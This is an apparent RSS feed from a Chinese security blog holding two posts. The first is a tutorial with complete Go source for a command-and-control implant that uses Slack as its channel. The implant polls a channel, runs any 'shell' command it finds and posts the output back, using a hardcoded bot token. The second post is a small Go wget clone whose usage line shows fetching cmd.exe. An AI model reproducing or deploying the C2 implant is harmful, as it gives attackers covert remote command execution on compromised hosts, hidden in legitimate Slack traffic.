<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>golang &#8211; ChaBug Security</title>
	<atom:link href="/tags/golang/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>A blog for sharing knowledge, meeting peers, and sharing resources</description>
	<lastBuildDate>Sat, 03 Oct 2020 16:36:04 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>Writing a C2 in golang using Slack</title>
		<link>/web/1926.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 03 Oct 2020 16:36:04 +0000</pubDate>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[C2]]></category>
		<category><![CDATA[golang]]></category>
		<category><![CDATA[Slack]]></category>
		<guid isPermaLink="false">/?p=1926</guid>

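					<description><![CDATA[I have been learning golang recently and happened to see demon's analysis of a golang Slack C2, so I decided to write one myself. Configuring Slack I won't go over registering an account and so on. Visit https://api.slac...]]></description>
										<content:encoded><![CDATA[<p>I have been learning <span class="wpcom_tag_link"><a href="/tags/golang" title="golang" target="_blank">golang</a></span> recently and happened to see demon's analysis of a golang Slack C2, so I decided to write one myself.</p>
<h1>Configuring Slack</h1>
<p>I won't go over registering an account and so on. Visit https://api.slack.com/ and click <code>Start Building</code><br />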
<img src="https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/dc3e5b61-4384-6b3c-0bf6-3c850bcd4716.png" alt="image.png" /></p>
<p>Create an app<br />
<img src="/wp-content/uploads/2020/10/ea267bba-e73e-0625-3680-b40a02c7c70f.png" alt="image.png" /></p>
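<p>In the left sidebar, go to <code>OAuth &amp; Permissions</code> -> <code>Scopes</code> and configure the token's permissions. Configure two for now and add others later as they are needed.</p>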
<p><img src="/wp-content/uploads/2020/10/aea99b7f-6fed-a6f8-079b-bf48c2667ac6.png" alt="image.png" /></p>
<p>Then scroll back up and click <code>Install App to Workspace</code></p>
<p><img src="/wp-content/uploads/2020/10/697544f1-e014-6fb9-8504-173932481567.png" alt="image.png" /></p>
<p>Click allow; the page then redirects automatically to the token screen. Note down this token.</p>
<p><img src="/wp-content/uploads/2020/10/84e2a010-7c5f-0bfa-9a48-970282378400.png" alt="image.png" /></p>
<pre><code class="language-text line-numbers">xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S
</code></pre>
<p>Create a channel<br />
<img src="/wp-content/uploads/2020/10/fade1c37-c2f2-2a59-4786-b8bdd3ed7f9b.png" alt="image.png" /></p>
<p>Note the <code>C01BS6GEUJH</code> part of your channel link <code>https://app.slack.com/client/T01C58MD8L9/C01BS6GEUJH</code><br />
<img src="/wp-content/uploads/2020/10/eb1412aa-4741-2fcd-e50f-9ab3f5117882.png" alt="image.png" /></p>
<p>Add the bot to the channel with <code>/invite @myslackbot</code>.</p>
<p>All the APIs for operating the bot are listed at <code>https://api.slack.com/methods</code>. First, use <code>https://api.slack.com/methods/conversations.history/test</code> to test fetching the chat history.</p>
<p>Fill in the token and channel ID<br />
<img src="/wp-content/uploads/2020/10/5281e9f3-f145-d07d-e334-367dc2fd3bc9.png" alt="image.png" /></p>
<p>After clicking test, the chat history is returned<br />
<img src="/wp-content/uploads/2020/10/cd6fd11a-84fa-eb73-a34b-4baa8f4d36b1.png" alt="image.png" /></p>
<p><img src="/wp-content/uploads/2020/10/b68b1d1c-37b9-40f9-e99a-82cefdd50251.png" alt="image.png" /></p>
<p>With the basic flow understood, the next step is to drive the API from golang and write our <span class="wpcom_tag_link"><a href="/tags/c2" title="C2" target="_blank">C2</a></span>.</p>
<h1>Writing it in golang</h1>
<pre><code class="language-go line-numbers">package main

import (
    "fmt"
    "github.com/tidwall/gjson"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
    "strings"
    "time"
)

const (
    History_api = "https://slack.com/api/conversations.history"
    PostMessage = "https://slack.com/api/chat.postMessage"
    Token       = "xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S"
    Channel     = "C01BS6GEUJH"
)

func main() {
    for true {
        time.Sleep(time.Second * 10)
        result := getHistory()
        if strings.HasPrefix(result.Str, "shell") {
            cmdRes := ExecCommand(strings.Split(result.Str, " ")[1])
            putRes(cmdRes)
        } else if strings.HasPrefix(result.Str, "exit") {
            os.Exit(0)
        } else {
            fmt.Println("no command")
        }
    }
}

func getHistory() (result gjson.Result) {
    req, err := http.NewRequest("GET", History_api, nil)
    if err != nil {
        return gjson.Result{}
    }
    q := req.URL.Query()
    q.Add("token", Token)
    q.Add("channel", Channel)
    q.Add("pretty", "1")
    q.Add("limit", "1")
    req.URL.RawQuery = q.Encode()

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return gjson.Result{}
    }
    defer resp.Body.Close()
    byte, _ := ioutil.ReadAll(resp.Body)
    result = gjson.GetBytes(byte, "messages.0.text")
    return
}

func putRes(res string) {
    req, err := http.NewRequest("POST", PostMessage, nil)
    if err != nil {
        return
    }
    p := req.URL.Query()
    p.Add("token", Token)
    p.Add("channel", Channel)
    p.Add("pretty", "1")
    p.Add("text", res)
    req.URL.RawQuery = p.Encode()
    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return
    }
    defer resp.Body.Close()

}

func ExecCommand(command string) (out string) {
    cmd := exec.Command(command)
    o, err := cmd.CombinedOutput()

    if err != nil {
        out = fmt.Sprintf("shell run error: \n%s\n", err)
    } else {
        out = fmt.Sprintf("combined out:\n%s\n", string(o))
    }
    return
}
</code></pre>
<p>Here is the result:</p>
<p>https://www.bilibili.com/video/BV1uk4y1C7oP/</p>
<p>I have quietly implemented many more features on my own, but I won't publish them. A lot can be done through Slack's API.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>wget implemented in golang</title>
		<link>/tools/645.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 24 Jan 2019 07:09:17 +0000</pubDate>
				<category><![CDATA[Tool Sharing]]></category>
		<category><![CDATA[Programming Study]]></category>
		<category><![CDATA[go]]></category>
		<category><![CDATA[golang]]></category>
		<category><![CDATA[wget]]></category>
		<guid isPermaLink="false">/?p=645</guid>

					<description><![CDATA[Result Code package main import ( "fmt" "io" "net/http" "os" ) var url, path string func main() ...]]></description>
										<content:encoded><![CDATA[<h3 id="效果">Result</h3>
<p><a class="fancybox" href="https://ws1.sinaimg.cn/large/006xriynly1fzhoflct09j30mk069aa7.jpg" data-fancybox="gallery" data-caption=""><img src="https://ws1.sinaimg.cn/large/006xriynly1fzhoflct09j30mk069aa7.jpg" alt="Result of the implementation" /></a></p>
<h3 id="代码"><i class="iconfont icon-link"></i>Code</h3>
<pre class="lang:default decode:true">package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
)

var url, path string

func main() {
	if len(os.Args) != 3 {
		fmt.Println("usage:wget.exe http://Y4er.com/cmd.exe cmd.exe")
		os.Exit(0)
	}
	url, path = os.Args[1], os.Args[2]
	fmt.Println("你要下载的文件是：" + url)
	fmt.Println("将要保存到：" + path)
	Download(url, path)
}
func Download(url string, path string) {
	out, err := os.Create(path)
	check(err)
	defer out.Close()

	res, err := http.Get(url)
	check(err)
	defer res.Body.Close()

	_, err = io.Copy(out, res.Body)
	check(err)
	fmt.Println("保存成功，自行检查" + path)
}
func check(err error) {
	if err != nil {
		panic(err)
	}
}</pre>
<p>Download link for the compiled 64-bit Windows build: <a href="http://y4er.com/file/go-wget.exe">http://Y4er.com/file/go-wget.exe</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
